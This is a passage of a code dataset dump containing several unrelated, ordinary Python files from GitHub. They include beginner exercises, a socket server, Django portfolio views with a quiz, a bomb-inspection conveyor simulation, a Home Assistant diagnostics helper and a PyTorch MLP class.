\"(\"\nliczba_nawiasow_otwierajacych = ciag_znakow.count(nawias)\n\nprint(\"Liczba nawiasow otwierajacych wynosi: \" + str(liczba_nawiasow_otwierajacych))\n\n# zadanie 1.7\n\nstudenci = [\"Anna Szczesny\", \"Tomasz Nijaki\", \"Barbara Kowalska\", \"Jan Niezbedny\"]\nposortowaniStudenci = sorted(studenci)\nfor student in posortowaniStudenci:\n print(student)\n\n# zadanie 1.8\n\nstudenci2 = [\"Anna Szczesny\", \"Tomasz Nijaki\", \"Barbara Kowalska\", \"Jan Niezbedny\"]\nposortowaneNazwiska = sorted(studenci2, key=lambda x: x.split()[1])\nfor student in posortowaneNazwiska:\n print(student)\n\n# zadanie 1.9\n\nstudenci3 = [\"Anna Szczesny\", \"Tomasz Nijaki\", \"Barbara Kowalska\", \"Jan Niezbedny\"]\nliczba_n = 0\nfor i in studenci3:\n if i.split()[1].startswith(\"N\"):\n liczba_n+=1\nprint(\"Liczba studentow na N wynosi: \"+ str(liczba_n))\n\n# zadanie 1.10\n\nwykres_1 = [[2, 4], [4, 4], [6, 4]]\nwykres_2 = [[2, 3], [4, 4], [6, 5]]\nwykres_3 = [[2, 3], [4, 3], [5, 4]]\n\ndef czyLiniowa(wykres):\n a1 = (wykres[1][1]-wykres[0][1])/(wykres[1][0]-wykres[0][0])\n a2 = 
(wykres[2][1]-wykres[0][1])/(wykres[2][0]-wykres[0][0])\n if a1==a2:\n funkcja = True\n else:\n funkcja = False\n return funkcja\n\nwykres_1_funkcja_liniowa = czyLiniowa(wykres_1)\nwykres_2_funkcja_liniowa = czyLiniowa(wykres_2)\nwykres_3_funkcja_liniowa = czyLiniowa(wykres_3)\n\nif wykres_1_funkcja_liniowa:\n print(\"Dla punktow w wykres_1 mozna wyznaczyc funkcje liniowa.\")\nelse:\n print(\"Dla punktow w wykres_1 nie mozna wyznaczyc funkcji liniowej.\")\n\nif wykres_2_funkcja_liniowa:\n print(\"Dla punktow w wykres_2 mozna wyznaczyc funkcje liniowa.\")\nelse:\n print(\"Dla punktow w wykres_2 nie mozna wyznaczyc funkcji liniowej.\")\n\nif wykres_3_funkcja_liniowa:\n print(\"Dla punktow w wykres_3 mozna wyznaczyc funkcje liniowa.\")\nelse:\n print(\"Dla punktow w wykres_3 nie mozna wyznaczyc funkcji liniowej.\")\n","repo_name":"izkacz/example_project","sub_path":"solo-work/solo_1.py","file_name":"solo_1.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5317858972","text":"import core, communicator\r\nimport socket\r\nimport os\r\nimport nltk\r\n\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver.bind((core.SERVER_IP,core.PORT))\r\nserver.listen()\r\nprint(\"Server listening on \" + core.SERVER_IP)\r\n\r\ndef receiveMessage(conn, addr):\r\n\ttry:\r\n\t\theader_rcv = conn.recv(core.HEADER_BUFFER).decode(core.FORMAT)\r\n\t\tprint(\"Received header: \" + header_rcv)\r\n\t\t# Receive header information\r\n\t\tmsg_len = int(header_rcv[:core.LEN_PAD])\r\n\t\tsignal = int(header_rcv[core.LEN_PAD:core.HEADER_BUFFER])\r\n\t\t\t\r\n\t\t# Receive input string\r\n\t\tmsg = conn.recv(msg_len).decode(core.FORMAT)\r\n\t\tprint(\"Received msg: \" + msg)\r\n\t\t\t\r\n\t\t# Write sentences into input file \r\n\t\tfile = open(os.getcwd() + core.INPUT_PATH + str(addr),'a')\r\n\t\tfor x in nltk.tokenize.sent_tokenize(msg):\r\n\t\t\tfile.write(x)\r\n\t\t\tfile.write('\\n')\r\n\t\tfile.close()\r\n\t\tprint(\"Finished writing input.\")\r\n\t\treturn int(signal)\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\treturn \r\n\r\ndef sendMessage(conn, addr):\t\r\n\ttry:\r\n\t\t# Open output file for the client, read it, then close\r\n\t\tfile = open(os.getcwd() + core.INPUT_PATH + str(addr),'r')\r\n\t\tmsg = file.read().replace('\\n', ' ')\r\n\t\tfile.close()\r\n\r\n\t\t# Send reply to client\r\n\t\theader = f'{len(msg.encode(core.FORMAT)):<{core.LEN_PAD}}'\r\n\t\tconn.send(header.encode(core.FORMAT))\r\n\t\tconn.send(msg.encode(core.FORMAT))\r\n\t\tprint(\"Sent header: \" + header)\r\n\t\tprint(\"Sent message: \" + msg)\r\n\t\t\r\n\t\t# Delete the output file after done sending\r\n\t\tos.remove(os.getcwd() + core.INPUT_PATH + str(addr))\r\n\t\t#os.remove(os.getcwd() + core.OUTPUT_PATH + str(addr))\r\n\t\tprint(\"Finished removing input-output files.\")\r\n\texcept Exception as e:\r\n\t\tprint(e)\r\n\t\treturn None\r\n\r\ndef handleClient():\r\n while True:\r\n client, addr = server.accept()\r\n print(f\"Connected with {str(addr)}.\")\r\n while True:\r\n try:\t\r\n signal = communicator.receiveMessage(client, addr[-1])\r\n if signal == core.Operation['MT']:\r\n continue\r\n # os.environ['MKL_THREADING_LAYER'] = 'GNU'\r\n # os.system(f\"onmt_translate -model {core.TRANSLATION_MODEL_PATH} -src {os.getcwd() + core.INPUT_PATH + str(addr[-1])} -output {os.getcwd() + core.OUTPUT_PATH + str(addr[-1])}\")\r\n elif signal == core.Operation['GEC']:\r\n # Call model GEC here \r\n continue \r\n else:\r\n 
print(f\"Error. Closing connection with {str(addr)}.\")\r\n                        client.close()\r\n                        break\r\n                communicator.sendMessage(client, addr[-1])\r\n            except Exception:\r\n                print(f\"Error. Closing connection with {str(addr)}.\")\r\n                client.close()\r\n                break\r\n\r\nhandleClient()","repo_name":"HeyLongHoang/languator","sub_path":"server/server_test.py","file_name":"server_test.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19351416902","text":"'''\nf = open(\"test.txt\",mode = 'r',encoding = 'utf-8')\nw write mode\nr read mode\na append mode\n\nw+ create file if it doesn't exist and open it in write mode\nr+ open an existing file in read+write mode\na+ create file if it doesn't exist and open it in append mode\n'''\n\ntry:\n    f = open(\"test.txt\",'r',encoding = 'utf-8')\n    f.read()\n    f.tell() # get the current file position\n    f.seek(0) # bring file cursor to initial position\n    #for line in f:\n    #\tprint(line, end = '')\n    # perform file operations\nfinally:\n    f.close()","repo_name":"bharathmuppa/Python-tutos","sub_path":"programs/file-operations/file-read.py","file_name":"file-read.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6012298703","text":"from django.urls import path\nfrom .views import CreateAccountView, AccountProfileView, EditAccountView\n\n\napp_name = 'users'\n\nurlpatterns = [\n    path('create-account/', CreateAccountView.as_view(), name='createAccount'),\n    path('', AccountProfileView.as_view(), name='AccountProfile'),\n    path('edit/', EditAccountView.as_view(), name='EditProfile'),  # Django routes must not start with a slash\n]\n\n# int pk references a unique user ID\n","repo_name":"FallowBlade/she-codes-django-news-project-FallowBlade","sub_path":"she_codes_news/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"29486139854","text":"import pymongo\n\nhostIP = \"10.192.213.155\"\nport = 10000\n\nclient = pymongo.MongoClient(host = hostIP, port = port)\ndb = client['IR']\ncollection = db['data']\n\ntmpDic = {\n    'userID': '00048766',\n    'temp': 38\n}\n\n# insert_one replaces Collection.insert, which was removed in PyMongo 4\nresult = collection.insert_one(tmpDic)\nprint(result.inserted_id)","repo_name":"alien18331/Sample_Code","sub_path":"Function/mangoDB/mangoDB.py","file_name":"mangoDB.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"182008757","text":"from configparser import ConfigParser\nimport os\nimport re\nfrom transformers.pipelines.token_classification import TokenClassificationPipeline\nfrom spacy.lang.fr import French\nimport fantastic.paths\n# Fill\nfrom fantastic.exercises.fill.edit_phrase import EditPhrase\nfrom fantastic.exercises.fill.expression_ecrite import ExpressionEcrite\nfrom fantastic.exercises.fill.transforme_mot import TransformeMot\nfrom fantastic.exercises.fill.rc_double import RemplirClavierDouble\nfrom fantastic.exercises.fill.remplir_clavier import RemplirClavier\nfrom fantastic.exercises.fill.transforme_phrase import TransformePhrase\nfrom fantastic.exercises.fill.rc_cadre import RemplirClavierCadre\n# Select\nfrom fantastic.exercises.select.classe import Classe\nfrom fantastic.exercises.select.cache_intrus import CacheIntrus\nfrom fantastic.exercises.select.coche_groupe_mots import CocheGroupeMots\nfrom fantastic.exercises.select.coche_intrus import CocheIntrus\nfrom fantastic.exercises.select.coche_phrases import CochePhrases\nfrom fantastic.exercises.select.coche_mots import CocheMots\n# Choose\nfrom fantastic.exercises.choose.choix_multiples import ChoixMultiples\nfrom fantastic.exercises.choose.classe_cm import ClasseCM\nfrom fantastic.exercises.choose.vrai_faux import VraiFaux\n# Swap\nfrom fantastic.exercises.swap.swap import Swap\n# Show\nfrom fantastic.exercises.show.texte import Texte\n\n\n\nCLASS_NAME_DICT = {\n    # Fill\n    \"ExpressionEcrite\": ExpressionEcrite,\n    \"RemplirClavier\": RemplirClavier,\n    \"RemplirClavierCadre\": RemplirClavierCadre,\n    \"RemplirClavierDouble\": RemplirClavierDouble,\n    \"EditPhrase\": EditPhrase,\n    \"TransformePhrase\": TransformePhrase,\n    \"TransformeMot\": TransformeMot,\n    # Select\n    \"Classe\": Classe,\n    \"CacheIntrus\": CacheIntrus,\n    \"CocheIntrus\": CocheIntrus,\n    \"CocheMots\": CocheMots,\n    \"CochePhrases\": CochePhrases,\n    \"CocheGroupeMots\": CocheGroupeMots,\n    # Choose\n    \"ChoixMultiples\": ChoixMultiples,\n    \"ClasseCM\": ClasseCM,\n    \"VraiFaux\": VraiFaux,\n    # Swap\n    \"Swap\": Swap,\n    # Show\n    \"Texte\": Texte\n    }\n\nEXERCISE_TYPE_DICT = {\n    # Fill\n    \"ExpressionEcrite\": \"expression_ecrite\",\n    \"RemplirClavier\": \"remplir_clavier\",\n    \"RemplirClavierCadre\": \"rc_cadre\",\n    \"RemplirClavierDouble\": \"rc_double\",\n    \"EditPhrase\": \"edit_phrase\",\n    \"TransformePhrase\": \"transforme_phrase\",\n    \"TransformeMot\": \"transforme_mot\",\n    # Select\n    \"Classe\": \"classe\",\n    \"CacheIntrus\": \"cache_intrus\",\n    \"CocheIntrus\": \"coche_intrus\",\n    \"CocheMots\": \"coche_mots\",\n    \"CochePhrases\": \"coche_phrases\",\n    \"CocheGroupeMots\": \"coche_groupe_mots\",\n    # Choose\n    \"ChoixMultiples\": \"choix-multiples\",\n    \"ClasseCM\": \"classe-cm\",\n    \"VraiFaux\": \"vrai-faux\",\n    # Swap\n    \"Swap\": \"swap\",\n    # Show\n    \"Texte\": \"texte\"\n}\n\nselect_subclasses: list = [\"Classe\",\"CacheIntrus\", \"CocheIntrus\", \"CocheMots\", \"CochePhrases\", \"CocheGroupeMots\"]\n\ndef convert_type_to_class_name(exercise_type: str):\n    \"\"\"Convert the output folder name associated with a class to its real class name\"\"\"\n    elems = re.split(r\"[-_\\s]\",exercise_type)\n    class_name = \"\"\n    for elem in elems:\n        if len(elem) <= 2:\n            if elem.lower() == \"rc\":\n                # \"rc\" expands to \"RemplirClavier\", e.g. \"rc_cadre\" -> \"RemplirClavierCadre\"\n                class_name += \"RemplirClavier\"\n            else:\n                class_name += elem.upper()\n        else:\n            class_name += elem.capitalize()\n    return class_name\n\ndef convert_class_name_to_type(class_name: str):\n    \"\"\"Convert the class name to the output folder name associated with the class\"\"\"\n    return EXERCISE_TYPE_DICT[class_name]\n\ndef generate_conversion_from_tag(id_exercise: str, tag: str, nlp_token_class: French = None, nlp: TokenClassificationPipeline = None):\n    \"\"\"Generate the conversion of an exercise into a given type (tag)\"\"\"\n    def init_exercise(id_exercise: str, tag: str):\n        \"\"\"Initialize a new instance of the exercise with the given type (tag)\"\"\"\n        if tag not in CLASS_NAME_DICT:\n            return None\n        json_path = os.path.join(fantastic.paths.JSON_DIR, id_exercise + \".json\")\n        config = ConfigParser()\n        config.read(os.path.join(fantastic.paths.FANTASTIC_DIR, \"exercises\", \"data.cfg\"))\n        return CLASS_NAME_DICT[tag](json_path, config)\n\n    exercise = init_exercise(id_exercise, tag)\n    if not exercise:\n        return \"\"\n    exercise.load_json()\n    exercise.create_template()\n    if tag in select_subclasses:\n        exercise.adapt(nlp_token_class, nlp)\n    else:\n        exercise.adapt()\n    return exercise.html_output\n","repo_name":"sassoncharlotte/cartable-fantastique","sub_path":"fantastic/correction/backend/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27969200345","text":"from random import random\nfrom openpyxl import load_workbook, Workbook\nimport argparse\n\nclass Bomb:\n    \"\"\"Model describing a bomb with minion stickers.\"\"\"\n\n    def __init__(self, id, is_broken):\n        self.id = id\n        self.is_broken = is_broken\n        self.minions_stickers = {}\n\n\nclass Conveyor:\n    \"\"\"Conveyor gets bombs and creates the minion workflow on the conveyor\"\"\"\n\n    def __init__(self, number_minions, minions_qualific, inspect, filename,\n                 sheet):\n        \"\"\"Initialize a Conveyor instance.\n\n        Parameters:\n        number_minions -- number of minions at the conveyor\n        minions_qualific -- the probabilities of a minion's answers.\n        Is defined as a tuple = (right, wrong, skip)\n        inspect -- number of minions that should test each bomb\n        filename -- xlsx file with bombs\n        sheet -- sheet where the bombs are stored.\n        \"\"\"\n        self.number_minions = number_minions\n        self.weights = minions_qualific\n        self.inspect = inspect\n        self.filename = filename\n        self.sheet = sheet\n        self.wb_manager = WorkbookManager(filename, sheet)\n        self.bombs = [Bomb(*record) for record in\n                      self.wb_manager.get_bombs_data()]\n        self.minions = [Minion(id, minions_qualific, self.wb_manager) for id in\n                        range(1, number_minions+1)]\n        self.motivation_report = []\n        self.qa_report = []\n        self.percentage_correct = 0\n\n    def run_conveyor(self):\n        \"\"\" Starts circular conveyor \"\"\"\n        count = 0\n        while count <= len(self.bombs) / self.number_minions:\n            from_box = self.number_minions * count\n            to_box = self.number_minions * (count + 1)\n            tape = self.bombs[from_box:to_box]\n            for turn in range(self.inspect):\n                for pos in range(len(tape)):\n                    self.minions[pos - turn].check_bomb(tape[pos])\n            count += 1\n\n    def generate_reports_and_salary(self):\n        \"\"\" Generate qa report and motivation report\"\"\"\n        correctly = 0.\n        for bomb in self.bombs:\n            # generate qa report\n            answers = list(bomb.minions_stickers.values())\n            yes = float(answers.count('yes'))\n            quorum = 'yes' if yes / self.inspect > 0.5 else 'no'\n            if quorum == 'yes':\n                self.qa_report.append((bomb.id, 0))\n                correctly += 1 if not bomb.is_broken else 0\n            else:\n                self.qa_report.append((bomb.id, 1))\n                correctly += 1 if bomb.is_broken else 0\n            # generate salary\n            for minion, answer in bomb.minions_stickers.items():\n                if answer is None:\n                    minion.skips += 1\n                    continue\n                elif answer == quorum:\n                    minion.bananas += 1\n                else:\n                    minion.floggings += 1\n        # generate motivation reports\n        for minion in self.minions:\n            self.motivation_report.append((minion.id, minion.bananas,\n                                           minion.floggings, minion.skips))\n        self.percentage_correct = correctly / len(self.bombs) * 100\n\n    def write_reports(self):\n        \"\"\" Writes reports and a log to the xlsx file\"\"\"\n\n        # write motivation report\n        column_names = ['minion_id', 'bananas_cnt', 'flogging_cnt',\n                        'bombs_skipped']\n        data = self.motivation_report\n        self.wb_manager.write_xslx('Motivation Report', column_names, data)\n\n        # write qa report\n        column_names = ['bomb_id', 'is_broken']\n        self.wb_manager.write_xslx('QA Report', column_names, self.qa_report)\n\n        # write percentage correct\n        column_names = ['% correct']\n        data = [(self.percentage_correct,)]\n        self.wb_manager.write_xslx('% correct', column_names, data)\n\n        # save in output file\n        filename = self.filename\n        ind = filename.find('.')\n        output_file = filename[:ind] + '_output' + filename[ind:]\n        self.wb_manager.wb.save(filename=output_file)\n\n\nclass Minion:\n    \"\"\"\n    Model describing minions.\n    Minions can check a bomb (method check_bomb).\n    \"\"\"\n\n    ANSWERS = (True, False, None)\n\n    def __init__(self, id, weights, wb_manager):\n        \"\"\"Initialize a Minion instance.\n\n        Parameters:\n        \"weights\" - probabilities of the possible ANSWERS\n        \"\"\"\n        self.id = id\n        self.weights = weights\n        self.wb_manager = wb_manager\n        self.bananas = 0\n        self.floggings = 0\n        self.skips = 0\n\n    def check_bomb(self, bomb):\n        decision = self.generate_decision(Minion.ANSWERS, self.weights)\n        if decision is None:\n            answer = None\n        elif decision:\n            answer = 'no' if bomb.is_broken else 'yes'\n        else:\n            answer = 'yes' if bomb.is_broken else 'no'\n        bomb.minions_stickers[self] = answer\n        self.wb_manager.minions_log((self.id, bomb.id, answer))\n\n    @staticmethod\n    def generate_decision(answers, weights):\n        \"\"\"\n        Generate a minion's decision, given the possible answers and\n        their probabilities\n        \"\"\"\n        total_weight = float(sum(weights))\n        rel_weight = [w / total_weight for w in weights]\n\n        # Probability for each element\n        probs = [sum(rel_weight[:i + 1]) for i in range(len(rel_weight))]\n\n        for (i, element) in enumerate(answers):\n            if random() <= probs[i]:\n                break\n        return element\n\n\nclass WorkbookManager:\n    def __init__(self, filename, sheet):\n        self.wb = load_workbook(filename)\n        self.bombs_sheet = sheet\n        self.wb_output = Workbook()\n        self.log_sheet = self.wb.create_sheet(title='Log')\n        self.row_cursor = 1\n\n    def get_bombs_data(self):\n        bombs_sheet = self.wb[self.bombs_sheet]\n        for row in bombs_sheet.iter_rows(min_row=2):  # skip the header row\n            yield [cell.value for cell in row]\n\n    def write_xslx(self, sheet_name, column_names, data):\n        title_row = 1\n        ws = self.wb.create_sheet(title=sheet_name)\n        for col, col_name in enumerate(column_names, 1):\n            ws.cell(column=col, row=title_row, value=col_name)\n\n        for row, record in enumerate(data, title_row + 1):\n            for col, value in enumerate(record, 1):\n                ws.cell(column=col, row=row, value=value)\n\n    def minions_log(self, record):\n        \"\"\"\n        Write minion bomb check data to the file.\n        \"\"\"\n        column_names = ['minion_id', 'bomb_id', 'answer']\n        if self.row_cursor == 1:\n            for col, col_name in enumerate(column_names, 1):\n                self.log_sheet.cell(column=col, row=self.row_cursor, value=col_name)\n            self.row_cursor += 1\n        for col, value in enumerate(record, 1):\n            self.log_sheet.cell(row=self.row_cursor, column=col, value=value)\n        self.row_cursor += 1\n\n\nif __name__ == '__main__':\n    # parsing arguments\n    import sys\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-m', action='store', dest='minions',\n                        help='Number of minions on conveyor')\n    parser.add_argument('-c', action='store', dest='correct', default=60,\n                        help='The probability of a correct answer. Default=60')\n    parser.add_argument('-s', action='store', dest='skip', default=10,\n                        help='The probability of a skip')\n    parser.add_argument('-i', action='store', dest='inspect',\n                        help='Number of inspections each bomb')\n    parser.add_argument('-file', action='store', dest='file',\n                        default='bombs.xlsx', help='Xlsx file with bombs')\n    parser.add_argument('-sheet', action='store', dest='sheet', default='Bombs',\n                        help='Sheet with bombs in xlsx file')\n    args = parser.parse_args()\n\n    correct = float(args.correct) / 10\n    skip = float(args.skip) / 10\n    # correct and skip are percentages; after dividing by 10 they must sum to at most 10\n    if correct + skip > 10:\n        sys.exit('The sum of probabilities of correct and skip must not exceed 100')\n    if not args.minions or not args.inspect:\n        sys.exit('Number of minions and inspections is required')\n    minions = int(args.minions)\n    inspect = int(args.inspect)\n    if minions < inspect:\n        sys.exit('Number of inspections can\\'t be more than minions')\n    qualific = (correct, 10 - correct - skip, skip)\n\n    # program execution\n    conveyor = Conveyor(\n        minions,\n        qualific,\n        inspect,\n        args.file,\n        args.sheet\n    )\n    conveyor.run_conveyor()\n    conveyor.generate_reports_and_salary()\n    conveyor.write_reports()\n","repo_name":"Begun-A/Conveyor","sub_path":"conveyor.py","file_name":"conveyor.py","file_ext":"py","file_size_in_byte":8662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32190165511","text":"\"\"\"Diagnostics support for Smart Irrigation.\"\"\"\nfrom __future__ import annotations\nimport json\nimport logging\n\nfrom typing import Any\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom . import const\n\n_LOGGER = logging.getLogger(__name__)\n\nasync def async_get_config_entry_diagnostics(\n    hass: HomeAssistant, config_entry: ConfigEntry\n) -> dict[str, Any]:\n    \"\"\"Return diagnostics for a config entry.\"\"\"\n    storagedata = \"\"\n    try:\n        store = hass.data[const.DOMAIN][\"coordinator\"].store\n        storagefile = store._store.path\n        with open(storagefile) as f:\n            data = json.load(f)\n        storagedata = data.get('data')\n    except Exception:\n        _LOGGER.error(\"Unable to load storage file to generate diagnostics.\")\n    config_entry_info = config_entry.as_dict()\n    if \"data\" in config_entry_info and \"owm_api_key\" in config_entry_info[\"data\"]:\n        config_entry_info[\"data\"][\"owm_api_key\"] = \"XXXXXXXX\"\n    if \"options\" in config_entry_info and \"owm_api_key\" in config_entry_info[\"options\"]:\n        config_entry_info[\"options\"][\"owm_api_key\"] = \"XXXXXXXXXXX\"\n    diag: dict[str, Any] = {\"config\": config_entry_info, \"storage\": storagedata}\n    return diag\n","repo_name":"jeroenterheerdt/HAsmartirrigation","sub_path":"custom_components/smart_irrigation/diagnostics.py","file_name":"diagnostics.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":252,"dataset":"github-code","pt":"34"} +{"seq_id":"24849147355","text":"from typing import Final\r\n\r\nDIRECTION_NAME: Final[list[str]] = [\r\n    \"N\",\r\n    \"NNE\",\r\n    \"NE\",\r\n    \"ENE\",\r\n    \"E\",\r\n    \"ESE\",\r\n    \"SE\",\r\n    \"SSE\",\r\n    \"S\",\r\n    \"SSW\",\r\n    \"SW\",\r\n    \"WSW\",\r\n    \"W\",\r\n    \"WNW\",\r\n    \"NW\",\r\n    \"NNW\",\r\n    \"N\",\r\n]\r\n\r\n\r\ndef degree_to_direction(degree: int) -> str:\r\n    # wrap from north back to north: take degree mod 360 and divide by 22.5 to get the index\r\n    return DIRECTION_NAME[round((degree % 360) / 
22.5)]\r\n","repo_name":"item4/yui","sub_path":"yui/apps/weather/wind.py","file_name":"wind.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"ko","doc_type":"code","stars":30,"dataset":"github-code","pt":"34"} +{"seq_id":"35885117271","text":"import sys\nsys.path.insert(1, '..')\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport honors_work.data as data\nimport honors_work.utils as utils\nimport torch.nn.functional as F\nimport numpy as np\n\nclass Models(nn.Module):\n \"\"\"This class contains the attributes that all models have in common.\n All models will inherit from this class \n \n ...\n Parameters (Not Attributes)\n ---------------------------\n cuda : bool\n If True, the model will train using GPU acceleration if a CUDA\n GPU is available. If False, the model will train on CPU\n \n Attributes\n ----------\n loss : str\n The loss function for the model. Options are {'L1', 'MSE', \n 'CrossEntropy'}.\n dataset : str\n The dataset that the model will be trained on. Options are \n {'MNIST'}.\n cuda : bool\n If True, the model will train using GPU acceleration if a CUDA\n GPU is available. If False, the model will train on CPU\n \"\"\"\n \n def __init__(self, loss, dataset, cuda):\n super(Models, self).__init__()\n \n loss_functions = {'L1': nn.L1Loss(), \n 'MSE': nn.MSELoss(), \n 'CrossEntropy': nn.CrossEntropyLoss()}\n \n datasets = {'MNIST' : data.MNIST()}\n \n self.loss = loss_functions[loss]\n self.data = datasets[dataset]\n \n if cuda and torch.cuda.is_available():\n self.device = torch.device('cuda')\n else:\n self.device = torch.device('cpu') \n \n \nclass MultilayerPerceptron(Models):\n \"\"\"A Multilayer Perceptron with a single hidden layer of variable size\n \n ...\n Parameters (Not Attributes)\n ---------------------------\n cuda : bool\n If True, the model will train using GPU acceleration if a CUDA\n GPU is available. If False, the model will train on CPU\n \n Attributes\n ----------\n loss : str\n The loss function for the model. Options are {'L1', 'MSE',\n 'CrossEntropy'}.\n dataset : str\n The dataset that the model will be trained on. Options are\n {'MNIST'}.\n optim : str\n The optimizer that the model will use while training. 
Options are\n {'SGD'} \n param_counts : np.array \n List of parameter counts that the model will be trained over.\n Since this model is an MLP, these counts correspond to N*10^3 \n neurons for a parameter count, N.\n current_count : int\n The index of the current parameter count in param_counts\n losses : dict\n Dictionary of lists of final losses for each model that \n is trained at each parameter count\n scheduler : \n \"\"\"\n \n def __init__(self, loss='MSE', dataset='MNIST', cuda=False, optimizer='SGD'):\n super(MultilayerPerceptron, self).__init__(loss, dataset, cuda)\n \n self.param_counts = np.array([1, 2, 3])\n self.current_count = 0\n self.input_layer = nn.Linear(self.data.data_x_dim * self.data.data_y_dim, \n self.param_counts[self.current_count]*10**3)\n self.hidden_layer = nn.Linear(self.param_counts[self.current_count]*10**3, 10)\n# self.mlp_optim = optim.SGD([self.input_layer.weight, self.hidden_layer.weight], lr=.01, \n# momentum=0.95)\n# self.scheduler = optim.lr_scheduler.StepLR(self.mlp_optim, step_size=500, gamma=0.1)\n self.losses = {'train': np.array([]), 'test': np.array([])}\n \n def forward(self, x):\n x = x.view(-1, self.data.data_x_dim * self.data.data_y_dim)\n x = F.relu(self.input_layer(x))\n x = F.relu(self.hidden_layer(x))\n return x\n \n\n \n \n \n","repo_name":"johnmath/DoubleDescentTestbed","sub_path":".ipynb_checkpoints/models-checkpoint.py","file_name":"models-checkpoint.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26040325167","text":"import matplotlib\nimport datetime\n\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom matplotlib import pyplot as plt\n\nfrom .models import Post\nfrom .models import Projeto\nfrom .models import Cadeira\nfrom .models import PontuacaoQuizz\nfrom .models import TFC\n\nfrom .forms import PostForm\nfrom .forms import ProjetoForm\nfrom .forms import CadeiraForm\nfrom .forms import TFCForm\n\nfrom django.shortcuts import render, HttpResponseRedirect, reverse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\n\nmatplotlib.use('Agg')\n\n\n# Create your views here.\ndef home_page_view(request):\n agora = datetime.datetime.now()\n context = {\n 'hora': agora.hour,\n }\n\n return render(request, 'portfolio/home.html', context)\n\ndef licenciatura_page_view(request):\n context = {'cadeiras': Cadeira.objects.all()}\n return render(request, 'portfolio/licenciatura.html', context)\n\ndef projetos_page_view(request):\n context = {'projetos': Projeto.objects.all()}\n return render(request, 'portfolio/projetos.html', context)\n\ndef blog_page_view(request):\n context = {'portfolio': Post.objects.all()}\n return render(request, 'portfolio/blog.html', context)\n\ndef tfc_page_view(request):\n context = {'trabalhos': TFC.objects.all()}\n return render(request, 'portfolio/tfc.html', context)\n\ndef quizz(request):\n if request.method == 'POST':\n n = request.POST['nome']\n p = pontuacao_quizz(request)\n r = PontuacaoQuizz(nome=n, pontos=p)\n r.save()\n\n desenha_grafico_resultados(request)\n return render(request, 'portfolio/quizz.html')\n\ndef pontuacao_quizz(request):\n pontuacao = 0\n if request.POST['primeira'] == \"Cascading Style Sheets\":\n pontuacao += 1\n\n if request.POST['segunda'] == \"HyperText Markup Language\":\n pontuacao += 1\n\n if request.POST['terceira'] == \"Marcadores\":\n pontuacao += 1\n\n if request.POST['quarta'] 
== \"Estruturar o conteúdo de uma página web\":\n        pontuacao += 1\n\n    if request.POST['quinta'] == \"Estilizar o conteúdo da página web.\":\n        pontuacao += 1\n\n    return pontuacao\n\ndef desenha_grafico_resultados(request):\n    pontuacoes = PontuacaoQuizz.objects.all()\n    pontuacao_sorted = sorted(pontuacoes, key=lambda objeto: objeto.pontos, reverse=False)\n    listaNomes = []\n    listapontuacao = []\n\n    for person in pontuacao_sorted:\n        listaNomes.append(person.nome)\n        listapontuacao.append(person.pontos)\n\n    plt.figure()  # start a fresh figure so repeated submissions don't stack bars onto the old chart\n    plt.barh(listaNomes, listapontuacao)\n    plt.savefig('portfolio/static/portfolio/images/resultados.png', bbox_inches='tight')\n    plt.close()\n\ndef novo_topico_view(request):\n    form = PostForm(request.POST or None)\n    if form.is_valid():\n        form.save()\n        return HttpResponseRedirect(reverse('portfolio:blog'))\n\n    context = {'form': form}\n    return render(request, 'portfolio/novo.html', context)\n\ndef edita_topico_view(request, topico_id):\n    topico = Post.objects.get(id=topico_id)\n    form = PostForm(request.POST or None, instance=topico)\n\n    if form.is_valid():\n        form.save()\n        return HttpResponseRedirect(reverse('portfolio:blog'))\n\n    context = {'form': form, 'topico_id': topico_id}\n    return render(request, 'portfolio/edita.html', context)\n\ndef apaga_topico_view(request, topico_id):\n    Post.objects.get(id=topico_id).delete()\n    return HttpResponseRedirect(reverse('portfolio:blog'))\n\ndef novo_projeto_view(request):\n    form = ProjetoForm(request.POST or None)\n    if form.is_valid():\n        form.save()\n        return HttpResponseRedirect(reverse('portfolio:projetos'))\n\n    context = {'form': form}\n    return render(request, 'portfolio/novo.html', context)\n\ndef editar_projeto_view(request, topico_id):\n    topico = Projeto.objects.get(id=topico_id)\n    form = ProjetoForm(request.POST or None, instance=topico)\n\n    if form.is_valid():\n        form.save()\n        return HttpResponseRedirect(reverse('portfolio:projetos'))\n\n    context = {'form': form, 'topico_id': topico_id}\n    return render(request, 'portfolio/editar_projeto.html', context)\n\ndef apagar_projeto_view(request, topico_id):\n    Projeto.objects.get(id=topico_id).delete()\n    return HttpResponseRedirect(reverse('portfolio:projetos'))\n\ndef novo_cadeira_view(request):\n    form = CadeiraForm(request.POST or None)\n    if form.is_valid():\n        form.save()\n        return HttpResponseRedirect(reverse('portfolio:licenciatura'))\n\n    context = {'form': form}\n    return render(request, 